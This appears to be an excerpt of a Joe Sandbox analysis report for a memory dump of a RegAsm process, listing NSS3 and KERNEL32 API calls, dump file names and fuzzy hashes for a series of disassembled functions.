Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Part of subcall function 6C1A8A60: TlsGetValue.KERNEL32(6C1561C4,?,6C155F9C,00000000), ref: 6C1A8A81
Part of subcall function 6C1A8A60: TlsGetValue.KERNEL32(?,?,?,6C155F9C,00000000), ref: 6C1A8A9E
Part of subcall function 6C1A8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C155F9C,00000000), ref: 6C1A8AB7
Part of subcall function 6C1A8A60: PR_Unlock.NSS3(?,?,?,?,?,6C155F9C,00000000), ref: 6C1A8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8D10

Part of subcall function 6C1A8970: TlsGetValue.KERNEL32(?,00000000,6C1561C4,?,6C155639,00000000), ref: 6C1A8991
Part of subcall function 6C1A8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C155639,00000000), ref: 6C1A89AD
Part of subcall function 6C1A8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C155639,00000000), ref: 6C1A89C6
Part of subcall function 6C1A8970: PR_WaitCondVar.NSS3 ref: 6C1A89F7
Part of subcall function 6C1A8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C155639,00000000), ref: 6C1A8A0C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 5fc54d2da784804b4a439289ebf2a2a101c9afc4351146f00820eebec38b0f9d
Instruction ID: 3c187249f83c41100ce11d5dcf1c6cd8ba26ced9c7dab476b48c167f6caedf53
Opcode Fuzzy Hash: 5fc54d2da784804b4a439289ebf2a2a101c9afc4351146f00820eebec38b0f9d
Instruction Fuzzy Hash: D1B180B0E003089FEB14CF65DC90AAEB7BAFF54308F14412EE81AA7751E735A955CB51

Function 6C159C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C1711C0: PR_NewLock.NSS3 ref: 6C171216

free.MOZGLUE(?), ref: 6C159E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C159E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C159E4E
TlsGetValue.KERNEL32 ref: 6C159EA2

Part of subcall function 6C169500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C169546

EnterCriticalSection.KERNEL32(?), ref: 6C159EB6
PR_Unlock.NSS3 ref: 6C159ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C159F18

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: b163867c137f892d666dac780fa2447db665a5168c0d361edc45df2cf0d122bf
Instruction ID: c2009b281f09f5dc571aec962ea446ca8b0e9cced5dcc7b5ce2a39dd89624d69
Opcode Fuzzy Hash: b163867c137f892d666dac780fa2447db665a5168c0d361edc45df2cf0d122bf
Instruction Fuzzy Hash: FE81F4F1A002019FEB109F35DC50BAB7BA9FF54248F444529EC6987B41FB31E925C7A2

Function 6C16DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C16AB10: DeleteCriticalSection.KERNEL32(D958E852,6C171397,5B5F5EC0,?,?,6C16B1EE,2404110F,?,?), ref: 6C16AB3C
Part of subcall function 6C16AB10: free.MOZGLUE(D958E836,?,6C16B1EE,2404110F,?,?), ref: 6C16AB49
Part of subcall function 6C16AB10: DeleteCriticalSection.KERNEL32(5D5E6C36), ref: 6C16AB5C
Part of subcall function 6C16AB10: free.MOZGLUE(5D5E6C2A), ref: 6C16AB63
Part of subcall function 6C16AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C16AB6F
Part of subcall function 6C16AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C16AB76

TlsGetValue.KERNEL32 ref: 6C16DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C16DD0E
PK11_IsFriendly.NSS3(?), ref: 6C16DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C16DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C16DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C16DEA6
PR_Unlock.NSS3(?), ref: 6C16DF08

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 7b5405679f9d7682f9b3b894980b639273311fd07e01a9d34bc96260794ec448
Instruction ID: 2841a2271f6aab27d25d623f85b08587ff82c0926830d48c09d19a3d6b7e54ae
Opcode Fuzzy Hash: 7b5405679f9d7682f9b3b894980b639273311fd07e01a9d34bc96260794ec448
Instruction Fuzzy Hash: 8F9108B5A001059FEB00EF6AC880BABB7B5FF55308F254065DC199BF41EB31E965CBA1

Function 6C0D4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0D4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0D51BB

Strings

%s at line %d of [%.10s], xrefs: 6C0D51B4
unable to delete/modify user-function due to active statements, xrefs: 6C0D51DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0D51A5
misuse, xrefs: 6C0D51AF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: fbe160b761e9910c0c2e16cadf9867d1d2597b71aaa6838cbe6cbfdf838424e8
Instruction ID: b3238813dd6ce6f4b7eedcbad6f91fa0f45251356583262062f36f26de08c150
Opcode Fuzzy Hash: fbe160b761e9910c0c2e16cadf9867d1d2597b71aaa6838cbe6cbfdf838424e8
Instruction Fuzzy Hash: 7871AEB960430A9BEB00CF55CC80B9A7BF5FF48308F0A4524FD199BA91D731E955CBA1

Function 6C17BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C17BD1E

Part of subcall function 6C152F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C152F0A
Part of subcall function 6C152F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C152F1D

Part of subcall function 6C1957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C15B41E,00000000,00000000,?,00000000,?,6C15B41E,00000000,00000000,00000001,?), ref: 6C1957E0
Part of subcall function 6C1957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C195843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C17BD8C

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C17BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C17BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C17BE3A

Part of subcall function 6C153E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C153EC2
Part of subcall function 6C153E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C153ED6
Part of subcall function 6C153E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C153EEE
Part of subcall function 6C153E60: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C153F02
Part of subcall function 6C153E60: PL_FreeArenaPool.NSS3 ref: 6C153F14
Part of subcall function 6C153E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C153F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C17BE52

Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C152CDA,?,00000000), ref: 6C152E1E
Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C152E33
Part of subcall function 6C152E00: TlsGetValue.KERNEL32 ref: 6C152E4E
Part of subcall function 6C152E00: EnterCriticalSection.KERNEL32(?), ref: 6C152E5E
Part of subcall function 6C152E00: PL_HashTableLookup.NSS3(?), ref: 6C152E71
Part of subcall function 6C152E00: PL_HashTableRemove.NSS3(?), ref: 6C152E84
Part of subcall function 6C152E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C152E96
Part of subcall function 6C152E00: PR_Unlock.NSS3 ref: 6C152EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C17BE61

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 9b48e2cbc2c84affb55a91f2fab84e1e05b1c3ef825f487504ebeb0f073b2a0d
Instruction ID: 700a1c07a95f5ae49795aef2823d8b75871212ac2ff35aca897c2037372ae128
Opcode Fuzzy Hash: 9b48e2cbc2c84affb55a91f2fab84e1e05b1c3ef825f487504ebeb0f073b2a0d
Instruction Fuzzy Hash: CB41F4B6A00210AFC720CF28DC80B6A77E4EF4871CF518568F91997751E731ED19CBA2

Function 6C19AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C19AB3E,?,?,?), ref: 6C19AC35

Part of subcall function 6C17CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C17CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C19AB3E,?,?,?), ref: 6C19AC55

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C19AB3E,?,?), ref: 6C19AC70

Part of subcall function 6C17E300: TlsGetValue.KERNEL32 ref: 6C17E33C
Part of subcall function 6C17E300: EnterCriticalSection.KERNEL32(?), ref: 6C17E350
Part of subcall function 6C17E300: PR_Unlock.NSS3(?), ref: 6C17E5BC
Part of subcall function 6C17E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C17E5CA
Part of subcall function 6C17E300: TlsGetValue.KERNEL32 ref: 6C17E5F2
Part of subcall function 6C17E300: EnterCriticalSection.KERNEL32(?), ref: 6C17E606
Part of subcall function 6C17E300: PORT_Alloc_Util.NSS3(?), ref: 6C17E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C19AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C19AB3E), ref: 6C19ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C19AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C19AD2B

Part of subcall function 6C17F360: TlsGetValue.KERNEL32(00000000,?,6C19A904,?), ref: 6C17F38B
Part of subcall function 6C17F360: EnterCriticalSection.KERNEL32(?,?,?,6C19A904,?), ref: 6C17F3A0
Part of subcall function 6C17F360: PR_Unlock.NSS3(?,?,?,?,6C19A904,?), ref: 6C17F3D3

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 6d77ba03f385f4d18d5c04ab2ac6079bbdb867ccc7b92edb3f2cdea77f1455be
Instruction ID: 896a44a6e899a0d31e96fb35db44be30e1b58e2c4dd7e846861b9d5e8a21f21f
Opcode Fuzzy Hash: 6d77ba03f385f4d18d5c04ab2ac6079bbdb867ccc7b92edb3f2cdea77f1455be
Instruction Fuzzy Hash: 673129B1E006155FEB00DF69DC40AAF77B6EF84728B198528E8159BB40EB31DD19C7A1

Function 6C178C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C178C7C

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C178CB0
TlsGetValue.KERNEL32 ref: 6C178CD1
EnterCriticalSection.KERNEL32(?), ref: 6C178CE5
PR_Unlock.NSS3(?), ref: 6C178D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C178D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C178D93

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 401050174ffbbf5c06e0b3a1b3c4a0d1da8fcea3107c0254a2fbdf0a202aabf3
Instruction ID: 9013ea9c32e6e6ab5314b76b2d0d03e32f3932bea0be645b78430fa2b3611785
Opcode Fuzzy Hash: 401050174ffbbf5c06e0b3a1b3c4a0d1da8fcea3107c0254a2fbdf0a202aabf3
Instruction Fuzzy Hash: D3313571A00205AFEB20AF68DD447EAB7B0FF14318F240136EE1967B90D770A964CBE1

Function 6C1B9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C1B9C5B), ref: 6C1B9D82

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C1B9C5B), ref: 6C1B9DA9

Part of subcall function 6C1B1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?,00000000), ref: 6C1B136A
Part of subcall function 6C1B1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?,00000000), ref: 6C1B137E
Part of subcall function 6C1B1340: PL_ArenaGrow.NSS3(?,6C14F599,?,00000000,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?), ref: 6C1B13CF
Part of subcall function 6C1B1340: PR_Unlock.NSS3(?,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?,00000000), ref: 6C1B145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C1B9C5B), ref: 6C1B9DCE

Part of subcall function 6C1B1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?,00000000), ref: 6C1B13F0
Part of subcall function 6C1B1340: PL_ArenaGrow.NSS3(?,6C14F599,?,?,?,00000000,00000000,?,6C15895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C1B1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C1B9C5B), ref: 6C1B9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C1B9C5B), ref: 6C1B9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C1B9C5B), ref: 6C1B9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C1B9C5B), ref: 6C1B9E91

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Part of subcall function 6C1B1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C1AFAAB,00000000), ref: 6C1B157E
Part of subcall function 6C1B1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C1AFAAB,00000000), ref: 6C1B1592
Part of subcall function 6C1B1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C1B1600
Part of subcall function 6C1B1560: PL_ArenaRelease.NSS3(?,?), ref: 6C1B1620
Part of subcall function 6C1B1560: PR_Unlock.NSS3(?), ref: 6C1B1639

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 99cdbb240edf2354f813187a0e857df76f2e3265ad0d1442fba6206edcbd18f8
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 1941A0B4601606AFE740DF15D850B92BBB1FF55358F258128E8189BFA0EB76E835CF90

Function 6C1ADC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C1AD9E4,00000000), ref: 6C1ADC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C1AD9E4,00000000), ref: 6C1ADC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C1AD9E4,00000000), ref: 6C1ADC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C1ADC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1ADCAD

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 91f7c2af5f7c535bd60f094f7ec82dfee198e4be48166567a328f8d196e4fe1f
Instruction ID: 37be66af077f01ed02a5ee9dd0ef500fbcf862ff056ea2eaf6ba99ba9f8f3739
Opcode Fuzzy Hash: 91f7c2af5f7c535bd60f094f7ec82dfee198e4be48166567a328f8d196e4fe1f
Instruction Fuzzy Hash: 0D318DB9A00700AFD710DF99D884B96B7F8AF18358F54846CED48CBB05E772E945CBA1

Function 6C172E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C16E728,?,00000038,?,?,00000000), ref: 6C172E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C172E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C172E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C172E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C172E9E
PR_Unlock.NSS3(?), ref: 6C172EAB
PR_Unlock.NSS3(?), ref: 6C172F0D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 466ce242685926af2b2f676c22b9ea51667e9f2c6086653876b8684a1f09f3eb
Instruction ID: 52d9871fa4671dd499c5d992cc998187707ee8fd08917d5c674530ed1e4f121b
Opcode Fuzzy Hash: 466ce242685926af2b2f676c22b9ea51667e9f2c6086653876b8684a1f09f3eb
Instruction Fuzzy Hash: 9A3124B6A00105ABEB10AF69EC4897AB779EF15258B048164EC08C7B11FB32DC65CBE1

Function 6C1BCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C1BCD93,?), ref: 6C1BCEEE

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

